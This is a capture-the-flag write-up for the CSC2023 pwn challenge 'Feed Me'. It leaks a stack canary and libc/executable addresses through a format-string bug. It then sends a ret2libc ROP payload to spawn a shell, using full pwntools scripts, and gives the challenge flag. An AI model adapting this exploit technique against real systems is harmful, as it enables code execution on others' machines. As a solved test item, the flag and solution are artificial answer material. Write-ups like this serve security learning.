CSC2023 - [Pwn] - Feed Me

You,CSC2023Pwn
Back

Challenge Description

I don't have control on myself. Sometime, I can control otherwise I can't

Solution

First of all we would check the protections on binary

Alt text

All protections are enabled 😡

Let us run the binary

Alt text

There is vulnerability of format strings

We would need to find libc base inorder to get shell

from pwn import *
context.log_level = 'error'
elf = context.binary = ELF('./feedmepwn')
 
for i in range(1, 50):
	io = process()
	payload = f"AAAAAAAA.%{i}$p"
	io.sendline(payload.encode())
	io.sendline(b'dasfsaf')
	print(io.recvall(), i)
	io.close()

Alt text

As a tip

0x7f - libc
0x7ff - stack
0x5 - PIE
8 bytes address ending on 00 - Canary

Libc Base

Alt text

use xinfo <address> in pwndbg you would get offset

Alt text

Here offset is 0x29d90

Now after subtracting offset from address of %27$p we would get our libc base

Final Script 🔥

#!/usr/bin/env python3
 
from pwn import *
 
context.update(os="linux", arch="amd64")
 
r = process("./feedmepwn")
libc = ELF("./libc.so.6", checksec=False)
 
# 23 is canary
# 25 leaks libc_base+171408
# 27 leaks exe_base+4553
 
payload = b"%23$p.%25$p.%27$p"
log.info(f"Sending payload: {payload.decode()}")
r.sendline(payload)
 
leak = r.recvline().decode().rstrip().split(" - ")[1]
canary, libc_leak, exe_leak = leak.split(".")
canary = int(canary, 16)
libc_leak = int(libc_leak, 16)
exe_leak = int(exe_leak, 16)
libc_base = libc_leak-0x29d90
exe_base = exe_leak-0x11c9
log.success("Got leaks!")
log.info(f"\tcanary = {hex(canary)}")
log.info(f"\tlibc_base = {hex(libc_base)}")
log.info(f"\texe_base = {hex(exe_base)}")
 
libc.address = libc_base
libc_rop = ROP(libc)
 
BINSH = next(libc.search(b"/bin/sh"))
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]
POP_RDI = libc_rop.find_gadget(['pop rdi', 'ret'])[0]
ret = libc_rop.find_gadget(['ret'])[0]
 
offset_to_canary = 136
 
payload = b""
payload += b"A" * offset_to_canary
payload += p64(canary)
payload += p64(0)
payload += p64(ret)
payload += p64(POP_RDI)
payload += p64(BINSH)
payload += p64(SYSTEM)
payload += p64(EXIT)
payload1 = cyclic(136) + pack(canary) + pack(0) + pack(libc_base+0xf1f2f)
 
log.info(f"Sending ret2libc payload!")
 
r.sendline(payload)
log.success("Enjoy your shell :)")
r.interactive()

Alt text

Flag

CSC{G00d_C0mb1n4ti0n_0f_f0rm4t_Str1ngs_4nd_Buff3r_Ov3rfl0w}

Writeups 2023 © RootxRAN.